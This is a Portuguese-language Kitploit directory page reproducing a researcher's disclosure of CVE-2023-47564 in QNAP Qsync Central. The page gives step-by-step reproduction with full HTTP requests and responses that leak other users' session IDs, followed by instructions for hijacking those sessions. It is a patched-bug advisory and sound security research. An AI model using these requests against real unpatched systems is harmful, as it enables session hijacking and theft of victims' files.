Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-47564 — CVE-2023-47564 | Kitploit
Ferramentas/GitHubGitHub/c411e/cve-2023-47564
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubc411e/cve-2023-47564

CVE-2023-47564

CVE-2023-47564

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-47564

  • https://www.qnap.com/en/security-advisory/qsa-24-03
  • https://www.cve.org/CVERecord?id=CVE-2023-47564
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N (8.1)

"Foi relatada uma atribuição incorreta de permissão para um recurso crítico que afeta o Qsync Central. Se explorada, a vulnerabilidade pode permitir que usuários autenticados leiam ou modifiquem o recurso pela rede."

Data da Descoberta: 5 de dezembro de 2023

Data da Correção: 3 de fevereiro de 2024

Versão(ões) Afetada(s): Qsync Central 4.4.x, Qsync Central 4.3.x

Versão(ões) Corrigida(s): Qsync Central 4.4.0.15 (2024/01/04) e posteriores, Qsync Central 4.3.0.11 (2024/01/11) e posteriores

Resumo: Durante um teste de penetração recente, obtive acesso a um sistema QNAP como um usuário de baixo privilégio (aqui user123). Não havia arquivos interessantes, então investiguei um pouco mais. No sistema, apenas o aplicativo Qsync Central (https://www.qnap.com/en/app_releasenotes/list.php?app_choose=QsyncServer) estava sendo executado. Primeiro, tentei encontrar uma lista de todos os usuários disponíveis e inspecionei meu histórico de proxy. Encontrei o endpoint /cgi-bin/qsync/qboxRequest.cgi. Esse endpoint revelou informações sobre minha conta de usuário atual e também meu ID de sessão atual (sid).

A requisição foi a seguinte:

root@kitploit:~
GET /cgi-bin/qsync/qboxRequest.cgi?sid=60ud018n&_dc=1701766637869&subfunc=qbox&genQboxDeviceList=1&sort=1&filteruser=user123 HTTP/2
Host: vulnhost.com
Cookie: DESKTOP=1; WINDOW_MODE=1; nas_wfm_tree_x=200; QSYNC_SID=60ud018n; QSYNC_USER=user123; NAS_SID=60ud018n; QT=1701766635952
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnhost.com/cgi-bin/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

A resposta foi:

root@kitploit:~
HTTP/2 200 OK
Server: 
[...]

    <data>
        <device>
            <id><![CDATA[REDACTED]]></id>
            <type><![CDATA[3]]></type>
            <time><![CDATA[2023-12-05 09:57:14]]></time>
            <user><![CDATA[user123]]></user>
            <ip><![CDATA[REDACTED]]></ip>
            <sid><![CDATA[60ud018n]]></sid>
            <uid><![CDATA[REDACTED]]></uid>
            <action><![CDATA[1]]></action>
            <comp><![CDATA[Qsync-File Station]]></comp>
            <desc><![CDATA[File Station login Qsync]]></desc>
            <channel><![CDATA[0]]></channel>
            <online><![CDATA[0]]></online>
            <version><![CDATA[]]></version>
            <QsyncPath><![CDATA[/home/.Qsync]]></QsyncPath>
        </device>
    </data>
    <ret>0</ret>
</logroot>
</QDocRoot>

Interessante foi o parâmetro filteruser. Apenas o removi e, para minha surpresa, uma lista de todos os usuários e seus IDs de sessão foi retornada! Assim, consegui sequestrar a sessão de qualquer outro usuário logado. Para uma Prova de Conceito (PoC), usei uma das sessões para fazer login como um usuário diferente. Relatei a vulnerabilidade ao Programa de Recompensas por Bugs da QNAP. A comunicação foi fácil e uma correção foi implementada rapidamente.

Passos para Reproduzir (detalhados):

  1. Faça login no aplicativo web Qsync da QNAP como atacante, com uma conta de usuário comum e de baixo privilégio.

  2. Extraia o ID de Sessão (sid) do atacante a partir do cookie NAS_SID definido pelo aplicativo web Qsync.

  3. Use o valor sid do atacante tanto no cookie NAS_SID quanto no parâmetro sid da requisição HTTP GET e execute a seguinte requisição HTTP:

    root@kitploit:~
    GET /cgi-bin/qsync/qboxRequest.cgi?sid=yl9osz6l&subfunc=qbox&genQboxDeviceList=1&sort=1 HTTP/2
    Host: vulnhost.com
    Cookie: NAS_SID=yl9osz6l;
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://vulnhost.com/cgi-bin/
    X-Requested-With: XMLHttpRequest
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    
  4. Os IDs de Sessão válidos de todos os outros usuários atualmente logados no aplicativo web podem ser extraídos da resposta HTTP, por exemplo:

    root@kitploit:~
    HTTP/2 200 OK
    Server: 
    Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
    Vary: Referer
    X-Xss-Protection: 1; mode=block
    Strict-Transport-Security: max-age=0
    X-Content-Type-Options: nosniff
    Content-Type: text/xml
    Date: Tue, 05 Dec 2023 10:32:00 GMT
    
    <?xml version="1.0" encoding="UTF-8" ?>
    <QDocRoot version="1.0">
    <authPassed><![CDATA[1]]></authPassed><model><modelName><![CDATA[TS-X71U]]></modelName><internalModelName><![CDATA[TS-X71]]></internalModelName><platform><![CDATA[TS-NASX86]]></platform><platform_ex><![CDATA[X86_HASWELL]]></platform_ex><customModelName><![CDATA[]]></customModelName><displayModelName><![CDATA[TVS-471U-RP]]></displayModelName><sas_model><![CDATA[0]]></sas_model><storage_v2>1</storage_v2>
    <encryptfsSupported><![CDATA[1]]></encryptfsSupported></model>
    <firmware><version><![CDATA[5.1.1]]></version><number><![CDATA[2491]]></number><build><![CDATA[20230815]]></build><patch><![CDATA[0]]></patch><buildTime><![CDATA[2023/08/15]]></buildTime></firmware>
    <sp><![CDATA[ALPHA]]></sp><rfs_bits><![CDATA[32]]></rfs_bits><specVersion><![CDATA[1.0]]></specVersion><hostname><![CDATA[Data]]></hostname><DemoSiteSuppurt><![CDATA[no]]></DemoSiteSuppurt><customLogo><customFrontLogo><![CDATA[]]></customFrontLogo><customLoginLogo><![CDATA[]]></customLoginLogo></customLogo>
    <logroot>
    <ADSSupport><![CDATA[1]]></ADSSupport><trustedDomain><enable><![CDATA[0]]></enable></trustedDomain>
        <count>239</count>
        <data>
            <device>
                <id><![CDATA[REDACTED]]></id>
                <type><![CDATA[3]]></type>
                <time><![CDATA[2023-12-05 11:31:50]]></time>
                <user><![CDATA[victim]]></user>
                <ip><![CDATA[REDACTED]]></ip>
                <sid><![CDATA[12345678]]></sid></span>
                <uid><![CDATA[REDACTED]]></uid>
                <action><![CDATA[1]]></action>
                <comp><![CDATA[Qsync-File Station]]></comp>
                <desc><![CDATA[File Station login Qsync]]></desc>
                <channel><![CDATA[0]]></channel>
                <online><![CDATA[1]]></online>
                <version><![CDATA[]]></version>
                <QsyncPath><![CDATA[/home/.Qsync]]></QsyncPath>
            </device>
    [...]
    
Baixar ferramenta

A captura de tela a seguir ilustra este problema (por questões de privacidade, os IDs de Sessão, bem como informações de identificação da instância testada do QNAP Qsync, foram ocultados):

Valores de ID de Sessão vazados
  • O atacante pode usar os valores sid extraídos para fazer login como qualquer uma das vítimas, definindo o cookie NAS_SID de acordo. Isso permite que o atacante sequestre a sessão da vítima e baixe qualquer arquivo armazenado no sistema QNAP pela vítima.